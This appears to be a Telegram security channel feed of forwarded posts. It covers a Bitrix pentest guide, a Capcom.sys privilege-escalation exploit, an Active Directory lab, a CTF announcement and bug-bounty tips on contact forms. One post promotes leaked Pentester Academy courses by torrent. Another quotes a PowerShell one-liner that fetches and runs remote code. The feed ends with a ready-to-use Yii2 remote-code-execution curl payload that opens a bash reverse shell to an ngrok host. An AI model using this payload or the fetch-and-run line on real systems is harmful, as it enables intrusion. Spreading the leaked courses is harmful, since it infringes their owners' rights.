SecList for CyberStudents
Think outside the box
Forwarded from SecuriXy.kz
🔐 Bitrix CMS - Ultimate Pentest Guide

A detailed guide to pentesting 1C-Bitrix, one of the most popular CMSs in the post-Soviet space. Useful both for red teams and for defending against attacks.

The guide covers:
– authentication bypasses
– XSS and SSRF
– LFI and RCE
– vulnerabilities in third-party modules (especially Aspro)
– WAF bypass techniques
and more

🔗 Source:
https://pentestnotes.ru/notes/bitrix_pentest_full/

📝 PS: news taken from a colleague
https://github.com/tandasat/ExploitCapcom

This is a standalone exploit for a vulnerable feature in Capcom.sys. The feature is exposed through IOCTL and executes an arbitrary user-supplied function pointer with SMEP disabled. This exploit simply abuses the feature to perform token stealing to get SYSTEM privileges, and then launches the command prompt with the elevated privilege.
Forwarded from Whitehat Lab
💻Gotham City - Active Directory Lab

An AD lab from the authors of NetExec consisting of 13! flags; the main goal is to become domain administrator.
After installation finishes, reboot all machines to flush extra passwords from memory (lsass).

💻 Barbhack

#windows #lab

Forwarded from Cyberkent Uz (Mudofaa Admin)
‼️ Registration must be carried out in compliance with these regulations and the rules set out at https://ctf.cyberkent.uz/about. If the rules set out in the regulations are not followed, teams will be blocked without warning and, as a result, will not be able to take part in the competition.

🗣 The CTF competition runs for 2 days:
May 29, from 09:00 to 17:00
May 30, from 09:00 to 17:00.

ℹ️ In addition, part 1 will take place on day 1 of the CTF competition, that is, on May 29.
Part 2 will take place on day 2 of the competition, that is, on May 30.
Forwarded from Proxy Bar
Grafana CVE-2025-4123: XSS and Full-Read SSRF
*
Script to exploit
Forwarded from white2hack 📚
Pentester Academy All courses (Leaked)

Prepare for real-world scenarios with immersive, hands-on labs to solidify technical knowledge

Pentester Academy is now Skill Dive, a secure, risk-free environment to put into practice what you’ve learned from traditional training. Expanded focus areas include: networking, cybersecurity, and cloud

⛳️ Main page
👀 Official catalog

❗️Downloads via torrent

#education #pentest
🔨 PDFSearch - a tool for searching more than 18 million PDF documents.

➡️ https://www.pdfsearch.io/
Forwarded from Sploitus Agency
How I found a vulnerability in a contact form and got $1200:

When I visited the site I found the application submission section. It seemed interesting to me because you could upload your résumé. So I uploaded an HTML file (I explained above how that works). The response returned the file's location; I opened it and it worked. Then I tried to make it more interesting so that it would look nicer in the report :) and uploaded the HTML to index.html in that same directory. Ta-da: when you opened the directory, instead of a 403 it served my HTML file with XSS. That is how they paid me $1200.

So what vulnerabilities do contact forms have? In a great many of the cases I have observed, Blind Stored XSS came up often. Besides that, in those sections there is no rate limit, or the logins and emails of the employee who is supposed to reply to you are visible through API requests. In such cases you will get bounties starting from at least $300. Besides that, if they are connected to SMTP or a Telegram bot, you will easily find the credentials inside the JS files. If such a vulnerability turns up, you will get a bounty of $1000+ on average. This really does lead to extremely dangerous situations, and at the very least it damages the organization's reputation. Honestly, it's not good if the bot swears at you when you press start, right? :) Admin panels mostly get less attention; after all, nobody can get into the admin panel, right? :)

Another interesting case I had: in an admin panel, they had left a bearer token in the admin panel for sending requests, and it belonged to the super admin. With it you can even create a user in the admin panel and log in. You enumerate the API with the bearer and identify the methods. You find the endpoints in the admin panel's app.js or main.js; if they are not there, brute forcing helps. In general, if there is a bearer and its privileges are high, you will get $2000 on average. If you check contact forms with exactly these methods, in many cases at least one of them will turn up. Use it!
Forwarded from Offensive Xwitter
😈 [ es3n1n @es3n1n ]

one-liner powershell.. so cool

irm https://dnot.sh/ | iex


🐥 [ tweet ]
CVE-2024–58136 — RCE PoC
*
Yii2  Framework
curl -k -X POST https://sub.domain.tld/index.php \
  -H "Content-Type: application/json" \
  -d '{"as hack": {"__class": "GuzzleHttp\\\\Psr7\\\\FnStream", "class": "yii\\\\behaviors\\\\AttributeBehavior", "__construct()": [[]], "_fn_close": "system", "stream": "bash -c '\''bash -i >& /dev/tcp/x.tcp.xx.ngrok.io/xxxx 0>&1'\''"}}'